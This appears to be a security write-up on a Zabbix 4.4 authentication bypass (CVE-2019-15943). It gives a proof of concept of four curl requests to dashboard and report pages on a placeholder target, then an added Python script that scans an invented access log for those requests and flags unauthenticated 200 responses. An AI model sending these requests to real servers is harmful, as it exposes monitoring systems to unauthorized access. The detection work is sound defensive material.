Zabbix is an open-source monitoring software tool for diverse IT components, including networks, servers, virtual machines (VMs) and cloud services. Zabbix provides monitoring metrics such as network utilization, CPU load and disk space consumption.

A vulnerability discovered by security researcher Todor Donev has been found in the popular system monitoring application Zabbix, enabling a third party to bypass authentication. Zabbix is a very popular tool for monitoring the availability of computer hosts, most commonly used by internet service providers and software companies. The vulnerability was found in Zabbix 4.4 and has been assigned CVE-2019-15943.

Proof of concept

curl -i https://TARGET/zabbix/zabbix.php?action=dashboard.list
curl -i https://TARGET/zabbix/zabbix.php?action=dashboard.view&dashboardid=1
curl -i https://TARGET/zabbix/screens.php?ddreset=1
curl -i https://TARGET/zabbix/report2.php?ddreset=1
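The four requests above are what the bypass looks like on the wire, so they are also what a defender should look for in the web server's access log while a Zabbix instance is still unpatched. The script below is an added example and is not part of the original post or of Zabbix itself. It parses constructed sample lines in the common "combined" log format, matches the endpoint and query parameters shown in the proof of concept, and flags direct hits (no Referer) that received HTTP 200. The working assumption, labelled in the code, is that a patched Zabbix answers an unauthenticated request to these pages with a redirect to the login page rather than 200; the IP addresses, timestamps and user agents in the sample are invented.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Constructed sample access log (combined format). None of this is real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2019:12:00:01 +0000] "GET /zabbix/zabbix.php?action=dashboard.list HTTP/1.1" 200 5120 "-" "curl/7.64.1"
203.0.113.7 - - [10/Oct/2019:12:00:02 +0000] "GET /zabbix/zabbix.php?action=dashboard.view&dashboardid=1 HTTP/1.1" 200 9811 "-" "curl/7.64.1"
203.0.113.7 - - [10/Oct/2019:12:00:03 +0000] "GET /zabbix/screens.php?ddreset=1 HTTP/1.1" 200 7000 "-" "curl/7.64.1"
198.51.100.4 - - [10/Oct/2019:12:01:00 +0000] "GET /zabbix/index.php HTTP/1.1" 200 3000 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Oct/2019:12:01:05 +0000] "GET /zabbix/zabbix.php?action=dashboard.view&dashboardid=1 HTTP/1.1" 200 9811 "https://zabbix.example/zabbix/index.php" "Mozilla/5.0"
192.0.2.9 - - [10/Oct/2019:12:02:00 +0000] "GET /zabbix/report2.php?ddreset=1 HTTP/1.1" 302 0 "-" "python-requests/2.22"
"""

# Combined log format: ip ident user [time] "method target proto" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Endpoints and query values taken from the proof of concept in the post:
# path -> (query parameter that must be present, accepted values)
WATCHED = {
    "/zabbix/zabbix.php": ("action", {"dashboard.list", "dashboard.view"}),
    "/zabbix/screens.php": ("ddreset", {"1"}),
    "/zabbix/report2.php": ("ddreset", {"1"}),
}


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    url = urlsplit(rec["target"])
    rec["path"] = url.path
    # parse_qs returns lists; keep the first value of each parameter
    rec["query"] = {k: v[0] for k, v in parse_qs(url.query).items()}
    rec["status"] = int(rec["status"])
    return rec


def is_watched(path, query):
    """True if the request targets one of the PoC endpoints with the PoC parameters."""
    rule = WATCHED.get(path)
    if rule is None:
        return False
    param, accepted = rule
    return query.get(param) in accepted


def find_suspicious(log_text):
    """Return parsed records that look like unauthenticated access to the watched pages."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or not is_watched(rec["path"], rec["query"]):
            continue
        # Assumption: a patched Zabbix redirects an unauthenticated visitor to the
        # login page (3xx). A direct request (no Referer, typical of a script or
        # curl) that is answered with 200 is consistent with the bypass and should
        # be reconciled against the Zabbix audit log for a matching session.
        if rec["status"] == 200 and rec["referer"] == "-":
            hits.append(rec)
    return hits


def summarize_by_ip(hits):
    """Count flagged requests per source address."""
    return Counter(h["ip"] for h in hits)


if __name__ == "__main__":
    flagged = find_suspicious(SAMPLE_LOG)
    for h in flagged:
        print(f'{h["ts"]} {h["ip"]} {h["method"]} {h["target"]} -> {h["status"]} ({h["ua"]})')
    print("per-source counts:", dict(summarize_by_ip(flagged)))
```

Run against a real log by replacing SAMPLE_LOG with the file contents. The browser request from 198.51.100.4 is not flagged because it carries a Referer from the login page, and the 302 to report2.php is not flagged because that is the expected answer from a patched server; both are heuristics, so treat the output as a triage list rather than a verdict.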
